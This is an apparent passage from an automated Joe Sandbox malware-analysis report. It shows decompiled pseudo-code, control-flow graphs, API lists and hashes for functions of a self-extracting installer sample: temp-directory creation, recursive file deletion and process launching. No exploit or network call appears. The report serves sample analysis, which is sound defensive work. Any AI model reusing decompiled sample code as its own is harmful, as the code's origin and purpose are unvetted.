                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                          • API String ID: 2126469477-58291647
                                                                                                                                                                                                          • Opcode ID: 5d4c6f5142dc3ba9fe765cc3735b9c2731b284b6bf49429297e4f7026d741b13
                                                                                                                                                                                                          • Instruction ID: 170d0cf8bc73d3e4555e52a0429d9e29c0a52febeb41234f7cb7408f72e67696
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d4c6f5142dc3ba9fe765cc3735b9c2731b284b6bf49429297e4f7026d741b13
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4141FB30A00A15DBDB30AB75AC4AA5633E8FB54751F131165ED45D2192EFB4CE84CB63
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 478 865467-865484 479 86551c-865528 call 861680 478->479 480 86548a-865490 call 8653a1 478->480 484 86552d-865539 call 8658c8 479->484 483 865495-865497 480->483 485 865581-865583 483->485 486 86549d-8654c0 call 861781 483->486 493 86554d-865552 484->493 494 86553b-865545 CreateDirectoryA 484->494 488 86558d-86559d call 866ce0 485->488 495 8654c2-8654d8 GetSystemInfo 486->495 496 86550c-86551a call 86658a 486->496 500 865554-865557 call 86597d 493->500 501 865585-86558b 493->501 498 865577-86557c call 866285 494->498 499 865547 494->499 504 8654fe 495->504 505 8654da-8654dd 495->505 496->484 498->485 499->493 511 86555c-86555e 500->511 501->488 512 865503-865507 call 86658a 504->512 509 8654f7-8654fc 505->509 510 8654df-8654e2 505->510 509->512 514 8654e4-8654e7 510->514 515 8654f0-8654f5 510->515 511->501 516 865560-865566 511->516 512->496 514->496 518 8654e9-8654ee 514->518 515->512 516->485 517 865568-865575 RemoveDirectoryA 516->517 517->485 518->512
                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                          			E00865467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t10;
                                                                                                                                                                                                          				void* _t13;
                                                                                                                                                                                                          				intOrPtr _t14;
                                                                                                                                                                                                          				void* _t16;
                                                                                                                                                                                                          				void* _t20;
                                                                                                                                                                                                          				signed int _t26;
                                                                                                                                                                                                          				void* _t28;
                                                                                                                                                                                                          				void* _t29;
                                                                                                                                                                                                          				CHAR* _t48;
                                                                                                                                                                                                          				signed int _t49;
                                                                                                                                                                                                          				intOrPtr _t61;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t10 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                          				if(__edx == 0) {
                                                                                                                                                                                                          					_t48 = 0x8691e4;
                                                                                                                                                                                                          					_t42 = 0x104;
                                                                                                                                                                                                          					E00861680(0x8691e4, 0x104);
                                                                                                                                                                                                          					L14:
                                                                                                                                                                                                          					_t13 = E008658C8(_t48); // executed
                                                                                                                                                                                                          					if(_t13 != 0) {
                                                                                                                                                                                                          						L17:
                                                                                                                                                                                                          						_t42 = _a4;
                                                                                                                                                                                                          						if(_a4 == 0) {
                                                                                                                                                                                                          							L23:
                                                                                                                                                                                                          							 *0x869124 = 0;
                                                                                                                                                                                                          							_t14 = 1;
                                                                                                                                                                                                          							L24:
                                                                                                                                                                                                          							return E00866CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t16 = E0086597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                          						if(_t16 != 0) {
                                                                                                                                                                                                          							goto L23;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t61 =  *0x868a20; // 0x0
                                                                                                                                                                                                          						if(_t61 != 0) {
                                                                                                                                                                                                          							 *0x868a20 = 0;
                                                                                                                                                                                                          							RemoveDirectoryA(_t48);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						L22:
                                                                                                                                                                                                          						_t14 = 0;
                                                                                                                                                                                                          						goto L24;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                          						 *0x869124 = E00866285();
                                                                                                                                                                                                          						goto L22;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					 *0x868a20 = 1;
                                                                                                                                                                                                          					goto L17;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t42 =  &_v268;
                                                                                                                                                                                                          				_t20 = E008653A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                          				if(_t20 == 0) {
                                                                                                                                                                                                          					goto L22;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                          				_t48 = 0x8691e4;
                                                                                                                                                                                                          				E00861781(0x8691e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                          				if(( *0x869a34 & 0x00000020) == 0) {
                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                          					_t42 = 0x104;
                                                                                                                                                                                                          					E0086658A(_t48, 0x104, 0x861140);
                                                                                                                                                                                                          					goto L14;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				GetSystemInfo( &_v304);
                                                                                                                                                                                                          				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                          				if(_t26 == 0) {
                                                                                                                                                                                                          					_push("i386");
                                                                                                                                                                                                          					L11:
                                                                                                                                                                                                          					E0086658A(_t48, 0x104);
                                                                                                                                                                                                          					goto L12;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t28 = _t26 - 1;
                                                                                                                                                                                                          				if(_t28 == 0) {
                                                                                                                                                                                                          					_push("mips");
                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t29 = _t28 - 1;
                                                                                                                                                                                                          				if(_t29 == 0) {
                                                                                                                                                                                                          					_push("alpha");
                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(_t29 != 1) {
                                                                                                                                                                                                          					goto L12;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_push("ppc");
                                                                                                                                                                                                          				goto L11;
                                                                                                                                                                                                          			}




















                                                                                                                                                                                                          0x00865472
                                                                                                                                                                                                          0x00865479
                                                                                                                                                                                                          0x00865481
                                                                                                                                                                                                          0x00865484
                                                                                                                                                                                                          0x0086551c
                                                                                                                                                                                                          0x00865521
                                                                                                                                                                                                          0x00865528
                                                                                                                                                                                                          0x0086552d
                                                                                                                                                                                                          0x0086552f
                                                                                                                                                                                                          0x00865539
                                                                                                                                                                                                          0x0086554d
                                                                                                                                                                                                          0x0086554d
                                                                                                                                                                                                          0x00865552
                                                                                                                                                                                                          0x00865585
                                                                                                                                                                                                          0x00865585
                                                                                                                                                                                                          0x0086558b
                                                                                                                                                                                                          0x0086558d
                                                                                                                                                                                                          0x0086559d
                                                                                                                                                                                                          0x0086559d
                                                                                                                                                                                                          0x00865557
                                                                                                                                                                                                          0x0086555e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865560
                                                                                                                                                                                                          0x00865566
                                                                                                                                                                                                          0x00865569
                                                                                                                                                                                                          0x0086556f
                                                                                                                                                                                                          0x0086556f
                                                                                                                                                                                                          0x00865581
                                                                                                                                                                                                          0x00865581
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865581
                                                                                                                                                                                                          0x00865545
                                                                                                                                                                                                          0x0086557c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086557c
                                                                                                                                                                                                          0x00865547
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865547
                                                                                                                                                                                                          0x0086548a
                                                                                                                                                                                                          0x00865490
                                                                                                                                                                                                          0x00865497
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086549d
                                                                                                                                                                                                          0x008654ab
                                                                                                                                                                                                          0x008654b4
                                                                                                                                                                                                          0x008654c0
                                                                                                                                                                                                          0x0086550c
                                                                                                                                                                                                          0x00865511
                                                                                                                                                                                                          0x00865515
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865515
                                                                                                                                                                                                          0x008654c9
                                                                                                                                                                                                          0x008654d6
                                                                                                                                                                                                          0x008654d8
                                                                                                                                                                                                          0x008654fe
                                                                                                                                                                                                          0x00865503
                                                                                                                                                                                                          0x00865507
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865507
                                                                                                                                                                                                          0x008654da
                                                                                                                                                                                                          0x008654dd
                                                                                                                                                                                                          0x008654f7
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008654f7
                                                                                                                                                                                                          0x008654df
                                                                                                                                                                                                          0x008654e2
                                                                                                                                                                                                          0x008654f0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008654f0
                                                                                                                                                                                                          0x008654e7
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008654e9
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008654C9
                                                                                                                                                                                                          • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0086553D
                                                                                                                                                                                                          • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0086556F
                                                                                                                                                                                                            • Part of subcall function 008653A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008653FB
                                                                                                                                                                                                            • Part of subcall function 008653A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00865402
                                                                                                                                                                                                            • Part of subcall function 008653A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0086541F
                                                                                                                                                                                                            • Part of subcall function 008653A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0086542B
                                                                                                                                                                                                            • Part of subcall function 008653A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00865434
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                          • API String ID: 1979080616-186922987
                                                                                                                                                                                                          • Opcode ID: 90070ef3572397b9f9d8378a28630c7a4ae197b7744793599cdfa16442879d32
                                                                                                                                                                                                          • Instruction ID: e52b53da727da92cb69858cb8bc5f231d02fa13fd256f7d8fd3763c870cff7fd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90070ef3572397b9f9d8378a28630c7a4ae197b7744793599cdfa16442879d32
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0313570B00A249BCF109B699C4D97E779AFB81300F1B012AE817D7781EFB48E018B96
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                                          			E00862390(CHAR* __ecx) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v276;
                                                                                                                                                                                                          				char _v280;
                                                                                                                                                                                                          				char _v284;
                                                                                                                                                                                                          				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                          				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t21;
                                                                                                                                                                                                          				int _t36;
                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                          				void* _t62;
                                                                                                                                                                                                          				void* _t63;
                                                                                                                                                                                                          				CHAR* _t65;
                                                                                                                                                                                                          				void* _t66;
                                                                                                                                                                                                          				signed int _t67;
                                                                                                                                                                                                          				signed int _t69;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                          				_t21 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                          				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                          				_t65 = __ecx;
                                                                                                                                                                                                          				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                          					L10:
                                                                                                                                                                                                          					_pop(_t62);
                                                                                                                                                                                                          					_pop(_t66);
                                                                                                                                                                                                          					_pop(_t46);
                                                                                                                                                                                                          					return E00866CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					E00861680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                          					_t58 = 0x104;
                                                                                                                                                                                                          					E008616B3( &_v280, 0x104, "*");
                                                                                                                                                                                                          					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                          					_t63 = _t22;
                                                                                                                                                                                                          					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                          						goto L10;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						goto L3;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					do {
                                                                                                                                                                                                          						L3:
                                                                                                                                                                                                          						_t58 = 0x104;
                                                                                                                                                                                                          						E00861680( &_v276, 0x104, _t65);
                                                                                                                                                                                                          						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                          							_t58 = 0x104;
                                                                                                                                                                                                          							E008616B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                          							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                          							DeleteFileA( &_v280);
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                          								E008616B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                          								_t58 = 0x104;
                                                                                                                                                                                                          								E0086658A( &_v280, 0x104, 0x861140);
                                                                                                                                                                                                          								E00862390( &_v284);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                          					} while (_t36 != 0);
                                                                                                                                                                                                          					FindClose(_t63); // executed
                                                                                                                                                                                                          					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                          					goto L10;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}





















                                                                                                                                                                                                          0x00862398
                                                                                                                                                                                                          0x0086239e
                                                                                                                                                                                                          0x008623a3
                                                                                                                                                                                                          0x008623a5
                                                                                                                                                                                                          0x008623ae
                                                                                                                                                                                                          0x008623b3
                                                                                                                                                                                                          0x008624cb
                                                                                                                                                                                                          0x008624d2
                                                                                                                                                                                                          0x008624d3
                                                                                                                                                                                                          0x008624d4
                                                                                                                                                                                                          0x008624df
                                                                                                                                                                                                          0x008623c2
                                                                                                                                                                                                          0x008623d1
                                                                                                                                                                                                          0x008623db
                                                                                                                                                                                                          0x008623e4
                                                                                                                                                                                                          0x008623f6
                                                                                                                                                                                                          0x008623fc
                                                                                                                                                                                                          0x00862401
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00862407
                                                                                                                                                                                                          0x00862407
                                                                                                                                                                                                          0x00862408
                                                                                                                                                                                                          0x00862411
                                                                                                                                                                                                          0x0086241f
                                                                                                                                                                                                          0x0086247a
                                                                                                                                                                                                          0x00862483
                                                                                                                                                                                                          0x00862495
                                                                                                                                                                                                          0x008624a3
                                                                                                                                                                                                          0x00862421
                                                                                                                                                                                                          0x0086242f
                                                                                                                                                                                                          0x00862453
                                                                                                                                                                                                          0x0086245d
                                                                                                                                                                                                          0x00862466
                                                                                                                                                                                                          0x00862472
                                                                                                                                                                                                          0x00862472
                                                                                                                                                                                                          0x0086242f
                                                                                                                                                                                                          0x008624af
                                                                                                                                                                                                          0x008624b5
                                                                                                                                                                                                          0x008624be
                                                                                                                                                                                                          0x008624c5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008624c5

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindFirstFileA.KERNELBASE(?,00868A3A,008611F4,00868A3A,00000000,?,?), ref: 008623F6
                                                                                                                                                                                                          • lstrcmpA.KERNEL32(?,008611F8), ref: 00862427
                                                                                                                                                                                                          • lstrcmpA.KERNEL32(?,008611FC), ref: 0086243B
                                                                                                                                                                                                          • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00862495
                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 008624A3
                                                                                                                                                                                                          • FindNextFileA.KERNELBASE(00000000,00000010), ref: 008624AF
                                                                                                                                                                                                          • FindClose.KERNELBASE(00000000), ref: 008624BE
                                                                                                                                                                                                          • RemoveDirectoryA.KERNELBASE(00868A3A), ref: 008624C5
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 836429354-0
                                                                                                                                                                                                          • Opcode ID: e5834c1847340784075cd5d0a81e9dd4efed372dfb98de6ab7c699b4ebcafc2f
                                                                                                                                                                                                          • Instruction ID: a36fe9eb0f414d22bd47348f94fd00ed7022d7299d3f567f5f449224c1f39ff2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5834c1847340784075cd5d0a81e9dd4efed372dfb98de6ab7c699b4ebcafc2f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64319031604A40ABC720EB68CC8DAEB73ECFBC5305F0A492DF556D6291EF7499098B57
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 631 863fef-864010 632 864016-86403b CreateProcessA 631->632 633 86410a-86411a call 866ce0 631->633 634 8640c4-864101 call 866285 GetLastError FormatMessageA call 8644b9 632->634 635 864041-86406e WaitForSingleObject GetExitCodeProcess 632->635 647 864106 634->647 637 864070-864077 635->637 638 864091 call 86411b 635->638 637->638 641 864079-86407b 637->641 646 864096-8640b8 CloseHandle * 2 638->646 641->638 645 86407d-864089 641->645 645->638 648 86408b 645->648 649 8640ba-8640c0 646->649 650 864108 646->650 647->650 648->638 649->650 651 8640c2 649->651 650->633 651->647
                                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                                          			E00863FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v524;
                                                                                                                                                                                                          				long _v528;
                                                                                                                                                                                                          				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t20;
                                                                                                                                                                                                          				void* _t22;
                                                                                                                                                                                                          				int _t25;
                                                                                                                                                                                                          				intOrPtr* _t39;
                                                                                                                                                                                                          				signed int _t44;
                                                                                                                                                                                                          				void* _t49;
                                                                                                                                                                                                          				signed int _t50;
                                                                                                                                                                                                          				intOrPtr _t53;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t45 = __edx;
                                                                                                                                                                                                          				_t20 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                          				_t39 = __ecx;
                                                                                                                                                                                                          				_t49 = 1;
                                                                                                                                                                                                          				_t22 = 0;
                                                                                                                                                                                                          				if(__ecx == 0) {
                                                                                                                                                                                                          					L13:
                                                                                                                                                                                                          					return E00866CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                          				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                          				if(_t25 == 0) {
                                                                                                                                                                                                          					 *0x869124 = E00866285();
                                                                                                                                                                                                          					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                                                                                                                                                                          					_t45 = 0x4c4;
                                                                                                                                                                                                          					E008644B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                                                                                                                                                                          					L11:
                                                                                                                                                                                                          					_t49 = 0;
                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                          					_t22 = _t49;
                                                                                                                                                                                                          					goto L13;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                          				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                          				_t44 = _v528;
                                                                                                                                                                                                          				_t53 =  *0x868a28; // 0x0
                                                                                                                                                                                                          				if(_t53 == 0) {
                                                                                                                                                                                                          					_t34 =  *0x869a2c; // 0x0
                                                                                                                                                                                                          					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                          						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                          						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                          							 *0x869a2c = _t44;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				E0086411B(_t34, _t44);
                                                                                                                                                                                                          				CloseHandle(_v544.hThread);
                                                                                                                                                                                                          				CloseHandle(_v544);
                                                                                                                                                                                                          				if(( *0x869a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                          					goto L12;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}


















                                                                                                                                                                                                          0x00863fef
                                                                                                                                                                                                          0x00863ffa
                                                                                                                                                                                                          0x00864001
                                                                                                                                                                                                          0x00864008
                                                                                                                                                                                                          0x0086400a
                                                                                                                                                                                                          0x0086400b
                                                                                                                                                                                                          0x00864010
                                                                                                                                                                                                          0x0086410a
                                                                                                                                                                                                          0x0086411a
                                                                                                                                                                                                          0x0086411a
                                                                                                                                                                                                          0x0086401c
                                                                                                                                                                                                          0x0086401d
                                                                                                                                                                                                          0x0086401e
                                                                                                                                                                                                          0x0086401f
                                                                                                                                                                                                          0x00864033
                                                                                                                                                                                                          0x0086403b
                                                                                                                                                                                                          0x008640ca
                                                                                                                                                                                                          0x008640e9
                                                                                                                                                                                                          0x008640f8
                                                                                                                                                                                                          0x00864101
                                                                                                                                                                                                          0x00864106
                                                                                                                                                                                                          0x00864106
                                                                                                                                                                                                          0x00864108
                                                                                                                                                                                                          0x00864108
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864108
                                                                                                                                                                                                          0x00864049
                                                                                                                                                                                                          0x0086405c
                                                                                                                                                                                                          0x00864062
                                                                                                                                                                                                          0x00864068
                                                                                                                                                                                                          0x0086406e
                                                                                                                                                                                                          0x00864070
                                                                                                                                                                                                          0x00864077
                                                                                                                                                                                                          0x0086407f
                                                                                                                                                                                                          0x00864089
                                                                                                                                                                                                          0x0086408b
                                                                                                                                                                                                          0x0086408b
                                                                                                                                                                                                          0x00864089
                                                                                                                                                                                                          0x00864077
                                                                                                                                                                                                          0x00864091
                                                                                                                                                                                                          0x0086409c
                                                                                                                                                                                                          0x008640a8
                                                                                                                                                                                                          0x008640b8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008640c2
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008640c2

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateProcessA.KERNELBASE ref: 00864033
                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00864049
                                                                                                                                                                                                          • GetExitCodeProcess.KERNELBASE ref: 0086405C
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0086409C
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 008640A8
                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 008640DC
                                                                                                                                                                                                          • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 008640E9
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3183975587-0
                                                                                                                                                                                                          • Opcode ID: 69e688931265a5654ff799d7fdc46d462de29c1563c48609909b0a24a4b86c5c
                                                                                                                                                                                                          • Instruction ID: 6c3b1c3d623bdcad5f7cdaf121c0ee33dd30baff9124f735c2fa0a8b44725d36
